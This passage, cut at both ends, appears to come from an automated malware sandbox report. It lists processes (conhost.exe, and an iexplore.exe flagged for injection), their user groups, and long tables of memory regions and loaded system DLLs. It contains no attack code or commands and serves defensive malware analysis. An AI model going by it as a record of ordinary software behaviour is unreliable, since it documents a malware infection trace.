"6" os_parent_pid = "0xcb0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1069 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1070 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1071 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1072 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1073 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1074 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1075 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1076 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1077 start_va = 0x7ff78ce40000 end_va = 0x7ff78ce50fff monitored = 0 entry_point = 0x7ff78ce416b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1078 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1079 start_va = 0x7c0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 1080 start_va = 0x7ff881ed0000 end_va = 0x7ff8820b7fff monitored = 0 entry_point = 0x7ff881efba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1081 start_va = 0x7ff884c10000 end_va = 0x7ff884cbcfff monitored = 0 entry_point = 0x7ff884c281a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1082 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1083 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1084 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1085 start_va = 0x7ff882220000 end_va = 0x7ff8822bcfff monitored = 0 entry_point = 0x7ff8822278a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1086 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1087 start_va = 0x600000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1088 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1089 start_va = 0x7ff87ae40000 end_va = 0x7ff87ae98fff monitored = 0 entry_point = 0x7ff87ae4fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1090 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1091 start_va = 0x7ff8822c0000 end_va = 0x7ff88253cfff monitored = 0 entry_point = 0x7ff882394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1092 start_va = 0x7ff883bf0000 end_va = 0x7ff883d0bfff monitored = 0 entry_point = 0x7ff883c302b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1093 start_va = 0x7ff881d50000 end_va = 0x7ff881db9fff monitored = 0 entry_point = 0x7ff881d86d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1094 start_va = 0x7ff8820c0000 end_va = 0x7ff882215fff monitored = 0 entry_point = 0x7ff8820ca8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1095 start_va = 0x7ff884a10000 end_va = 0x7ff884b95fff monitored = 0 entry_point = 0x7ff884a5ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1096 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1097 start_va = 0x7ff8842c0000 end_va = 0x7ff884402fff monitored = 0 entry_point = 0x7ff8842e8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1098 start_va = 0x7ff882550000 end_va = 0x7ff8825aafff monitored = 0 entry_point = 0x7ff8825638b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1099 start_va = 0x7ff8849d0000 end_va = 0x7ff884a0afff monitored = 0 entry_point = 0x7ff8849d12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1100 start_va = 0x7ff884410000 end_va = 0x7ff8844d0fff monitored = 0 entry_point = 0x7ff884430da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1101 start_va = 0x7ff87f8e0000 end_va = 0x7ff87fa65fff monitored = 0 entry_point = 0x7ff87f92d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1102 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1103 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1104 start_va = 0x8c0000 end_va = 0xa47fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 1105 start_va = 0xa50000 end_va = 0xbd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 1106 start_va = 0xbe0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 1107 start_va = 0x600000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1108 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1109 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1110 start_va = 0x650000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 1111 start_va = 0x7ff8825b0000 end_va = 0x7ff883b0efff monitored = 0 entry_point = 0x7ff8827111f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1112 start_va = 0x7ff881370000 end_va = 0x7ff8813b2fff monitored = 0 entry_point = 0x7ff881384b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1113 start_va = 0x7ff881620000 end_va = 0x7ff881c63fff monitored = 0 entry_point = 0x7ff8817e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1114 start_va = 0x7ff884920000 end_va = 0x7ff8849c6fff monitored = 0 entry_point = 0x7ff8849358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1115 start_va = 0x7ff884bb0000 end_va = 0x7ff884c01fff monitored = 0 entry_point = 0x7ff884bbf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1116 start_va = 0x7ff881330000 end_va = 0x7ff88133efff monitored = 0 entry_point = 0x7ff881333210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1117 start_va = 0x7ff881c70000 end_va = 0x7ff881d24fff monitored = 0 entry_point = 0x7ff881cb22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1118 start_va = 0x7ff8812e0000 end_va = 0x7ff88132afff monitored = 0 entry_point = 0x7ff8812e35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1119 start_va = 0x7ff881340000 end_va = 0x7ff881353fff monitored = 0 entry_point = 0x7ff8813452e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1120 start_va = 0x7ff87fc60000 end_va = 0x7ff87fcf5fff monitored = 0 entry_point = 0x7ff87fc85570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1121 start_va = 0x1fe0000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 1122 start_va = 0x21a0000 end_va = 0x24d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1123 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1124 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1125 start_va = 0x1d0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 1126 start_va = 0x6a0000 end_va = 0x6f9fff monitored = 1 entry_point = 0x6b53f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1127 start_va = 0x24e0000 end_va = 0x26f9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 1128 start_va = 0x2700000 end_va = 0x2911fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 1129 start_va = 0x6a0000 end_va = 0x7b5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1130 start_va = 0x2920000 end_va = 0x2b34fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002920000" filename = "" Region: id = 1131 start_va = 0x1fe0000 end_va = 0x20f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 1132 start_va = 0x2190000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Thread: id = 61 os_tid = 0xd08 Thread: id = 62 os_tid = 0xdcc Thread: id = 63 os_tid = 0xd00 Process: id = "8" image_name = "iexplore.exe" filename = "c:\\program files\\internet explorer\\iexplore.exe" page_root = "0x1d67a000" os_pid = "0x7e4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" about:blank" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1158 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1159 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1160 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1161 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1162 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 1163 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 1164 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1165 start_va = 0x180000 end_va = 0x181fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 1166 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1167 start_va = 0x1a0000 end_va = 0x1a1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 1168 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1169 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1170 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1171 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1172 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1173 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1174 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1175 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 1176 start_va = 0x4d0000 end_va = 0x4d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 1177 start_va = 0x4e0000 end_va = 0x4e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 1178 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1179 start_va = 0x500000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1180 start_va = 0x610000 end_va = 0x610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 1181 start_va = 0x620000 end_va = 0x620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 1182 start_va = 0x630000 end_va = 0x630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1183 start_va = 0x640000 end_va = 0x640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 1184 start_va = 0x650000 end_va = 0x650fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 1185 start_va = 0x660000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 1186 start_va = 0x670000 end_va = 0x670fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 1187 start_va = 0x680000 end_va = 0x680fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 1188 start_va = 0x690000 end_va = 0x690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1189 start_va = 0x6a0000 end_va = 0x6a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1190 start_va = 0x6b0000 end_va = 0x6b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1191 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1192 start_va = 0x6d0000 end_va = 0x6d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 1193 start_va = 0x700000 end_va = 0x887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 1194 start_va = 0x890000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 1195 start_va = 0xa20000 end_va = 0x1e1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 1196 start_va = 0x1e20000 end_va = 0x2156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1197 start_va = 0x2160000 end_va = 0x2160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002160000" filename = "" Region: id = 1198 start_va = 0x2170000 end_va = 0x222bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002170000" filename = "" Region: id = 1199 start_va = 0x2230000 end_va = 0x2233fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002230000" filename = "" Region: id = 1200 start_va = 0x2240000 end_va = 0x2240fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" Region: id = 1201 start_va = 0x2250000 end_va = 0x2250fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 1202 start_va = 0x2260000 end_va = 0x2260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002260000" filename = "" Region: id = 1203 start_va = 0x2270000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002270000" filename = "" Region: id = 1204 start_va = 0x2280000 end_va = 0x228ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002280000" filename = "" Region: id = 1205 start_va = 0x2290000 end_va = 0x2290fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002290000" filename = "" Region: id = 1206 start_va = 0x22a0000 end_va = 0x22a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022a0000" filename = "" Region: id = 1207 start_va = 0x22b0000 end_va = 0x22b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022b0000" filename = "" Region: id = 1208 start_va = 0x22c0000 end_va = 0x22c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022c0000" filename = "" Region: id = 1209 start_va = 0x22d0000 end_va = 0x22d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 1210 start_va = 0x22e0000 end_va = 0x22e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022e0000" filename = "" Region: id = 1211 start_va = 0x22f0000 end_va = 0x22f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022f0000" filename = "" Region: id = 1212 start_va = 0x2300000 end_va = 0x2305fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1213 start_va = 0x2310000 end_va = 0x2310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 1214 start_va = 0x2320000 end_va = 0x2325fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 1215 start_va = 0x2330000 end_va = 0x2330fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 1216 start_va = 0x2340000 end_va = 0x2345fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 1217 start_va = 0x2350000 end_va = 0x235ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 1218 start_va = 0x2360000 end_va = 0x245ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 1219 start_va = 0x2460000 end_va = 0x255ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 1220 start_va = 0x2560000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 1221 start_va = 0x2660000 end_va = 0x275ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 1222 start_va = 0x2760000 end_va = 0x285ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 1223 start_va = 0x2860000 end_va = 0x295ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 1224 start_va = 0x2960000 end_va = 0x2a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 1225 start_va = 0x2a60000 end_va = 0x2b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a60000" filename = "" Region: id = 1226 start_va = 0x2b60000 end_va = 0x2ce7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 1227 start_va = 0x2cf0000 end_va = 0x2deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cf0000" filename = "" Region: id = 1228 start_va = 0x2ff0000 end_va = 0x30effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ff0000" filename = "" Region: id = 1229 start_va = 0x30f0000 end_va = 0x30f5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 1230 start_va = 0x3100000 end_va = 0x3105fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 1231 start_va = 0x3110000 end_va = 0x3119fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 1232 start_va = 0x3120000 end_va = 0x3120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003120000" filename = "" Region: id = 1233 start_va = 0x3130000 end_va = 0x3130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003130000" filename = "" Region: id = 1234 start_va = 0x3140000 end_va = 0x3140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 1235 start_va = 0x3150000 end_va = 0x3150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003150000" filename = "" Region: id = 1236 start_va = 0x3160000 end_va = 0x3160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003160000" filename = "" Region: id = 1237 start_va = 0x3170000 end_va = 0x3170fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003170000" filename = "" Region: id = 1238 start_va = 0x3180000 end_va = 0x3180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 1239 start_va = 0x3190000 end_va = 0x3190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 1240 start_va = 0x31a0000 end_va = 0x31a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031a0000" filename = "" Region: id = 1241 start_va = 0x31b0000 end_va = 0x31b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031b0000" filename = "" Region: id = 1242 start_va = 0x31c0000 end_va = 0x31c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000031c0000" filename = "" Region: id = 1243 start_va = 0x31d0000 end_va = 0x32cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 1244 start_va = 0x32d0000 end_va = 0x32d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 1245 start_va = 0x32e0000 end_va = 0x32effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032e0000" filename = "" Region: id = 1246 start_va = 0x32f0000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032f0000" filename = "" Region: id = 1247 start_va = 0x3300000 end_va = 0x330ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003300000" filename = "" Region: id = 1248 start_va = 0x3310000 end_va = 0x3310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003310000" filename = "" Region: id = 1249 start_va = 0x3320000 end_va = 0x3320fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003320000" filename = "" Region: id = 1250 start_va = 0x3330000 end_va = 0x3330fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 1251 start_va = 0x3340000 end_va = 0x3340fff monitored = 1 entry_point = 0x0 